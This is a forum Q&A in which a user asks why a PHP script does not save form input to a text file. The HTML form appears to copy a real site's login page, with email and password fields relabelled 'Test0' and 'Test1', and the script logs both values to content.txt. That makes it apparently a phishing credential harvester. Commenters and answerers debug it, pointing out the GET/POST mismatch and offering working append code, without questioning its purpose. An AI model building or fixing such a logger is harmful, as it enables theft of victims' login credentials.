# Error when submitting input to a txt file in php

Tags: php

I am working on a input storer.
It does not write to the txt document with this code:

```
<?php
    if (isset($_GET['test0'])) {
        $file = 'content.txt';
        // Open the file to get existing content
        $current = file_get_contents($file);

        // Append a new line to the file
        $current .= "\n" . "(TEST0)". $_GET['test0'] . "(TEST1)". $_GET['test1'];

        // Write the contents back to the file
        file_put_contents($file, $current);
    }
?>
```

It is supposed to take the values from a `<input>` and store them. It isn't working, though. Here is the HTML:

```
<form action="" method="post" class="proceed maskable" name="login" autocomplete="off" novalidate>
    <div id="passwordSection" class="clearfix">
        <div class="textInput" id="login_emaildiv">
            <div class="fieldWrapper"><label for="email" class="fieldLabel">Test0</label><input id="email" name="test0" type="email" class="hasHelp  validateEmpty  "
                    required="required" aria-required="true" value="" autocomplete="off" placeholder="Email" /></div>
            <div class="errorMessage" id="emailErrorMessage">
                <p class="emptyError hide">Blank</p>
                <p class="invalidError hide">Blank</p>
            </div>
        </div>
        <div class="textInput lastInputField" id="login_passworddiv">
            <div class="fieldWrapper"><label for="password" class="fieldLabel">Test1</label><input id="password" name="Test0" type="password" class="hasHelp  validateEmpty  "
                    required="required" aria-required="true" value="" placeholder="Password" /></div>
            <div class="errorMessage" id="passwordErrorMessage">
                <p class="emptyError hide">Blank</p>
            </div>
        </div>
    </div>
</form>
```

How can I solve this problem.
Thanks!

Comment: your code is working in my localhost. make sure that you have file "content.txt" exists in proper location.

Comment: what error you are getting, double check whether file permission is read-write?

Comment: No, it just doesnt add anything to the content.txt

Comment: well dude, you are using `method="post"` and updating the file on `isset($_GET['test0'])`

Comment: Do I just need to remove the post method?

Comment: Two ways either remove `method=post` or use $_POST instead of $_GET

Comment: If there is valuable information above in the comments, please transfer that information to an answer proper, and not a question edit. Comments are frequently deleted here, and should be thought of as temporary.

Answer (score 1):

Try this :

```
<?php
    if (isset($_GET['test0'])) {

        $current = "\n" . "(TEST0)". $_GET['test0'] . "(TEST1)". $_GET['test1'];

        $myfile = fopen("content.txt", "a") or die("Unable to open file!");

        fwrite($myfile, $current);
        fclose($myfile)
    }
?>
```

Comment: Check the folder permission

Comment: I did. It has full permission

Answer (score 1):

Check the content.txt file permission

```
if (isset($_GET['test0'])) {

$file = __DIR__.'/content.txt';
// Open the file to get existing content
$current = file_get_contents($file);

// Append a new line to the file
$current .= "\n" . "(TEST0)". $_GET['test0'] . "(TEST1)". $_GET['test1'];

// Write the contents back to the file
file_put_contents($file, $current);
}
?>
```

Comment: Check the file permission

Comment: I did. It has full permission

Comment: Check the content.txt file path

Comment: Rather than reading file contents and writing it back in again, use `file_put_contents($file, "new string", FILE_APPEND)`. That should be a lot faster, since it will allow the operating system to make optimisations.